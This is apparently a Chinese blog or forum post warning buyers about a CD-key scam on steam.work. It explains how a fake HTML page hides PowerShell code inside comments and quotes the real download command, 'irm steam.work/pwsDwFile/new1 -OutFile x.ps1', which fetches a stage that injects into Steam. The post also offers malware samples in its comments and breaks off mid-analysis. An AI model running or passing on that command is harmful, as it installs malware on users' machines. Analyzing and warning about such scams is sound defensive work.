# 关于 steam.work 激活码诈骗脚本的分析

结论放在前面：如果买 cdkey 买到让你要输入某个脚本再激活的，那别去管他，立刻退货并举报商家！原因就直接贴我写这个就行...

## 正文
刚刚去买了个 cdkey 准备送给朋友，结果一看发货介绍感觉有点不对劲：【图1】
啥啊，irm iex 这不是经典的从网络获取脚本并执行的操作吗，怎么领个激活码还要搞这？

我一开始还以为是自动安装加速器，商家还怪好的捏，直到我激活不了，把这脚本拉下来看了看：【图2】
好家伙 这玩意整了个极其有欺骗性的东西，因为powershell的多行注释正好是<# #>，正好 HTML 文件的开头是 <!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转，真是够阴损
那么真实的代码就只剩一行了

irm steam.work/pwsDwFile/new1 -OutFile x.ps1

又下文件 这回下了个什么玩意出来？【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了！有病啊！
那么我们便不得不好奇一下注入的文件里到底干了啥呢，我们下下来....
（好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇！最后还是把WD关掉了）
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来，一看这文件头就是 PE 文件...原来是套娃，下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有，而且有三个 .text 段，其中两个都是空的，这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库？
（草 怎么快三点了 该睡觉了 明天再说！~）
相关样本我会发在评论区 想玩的各位可以玩玩看xD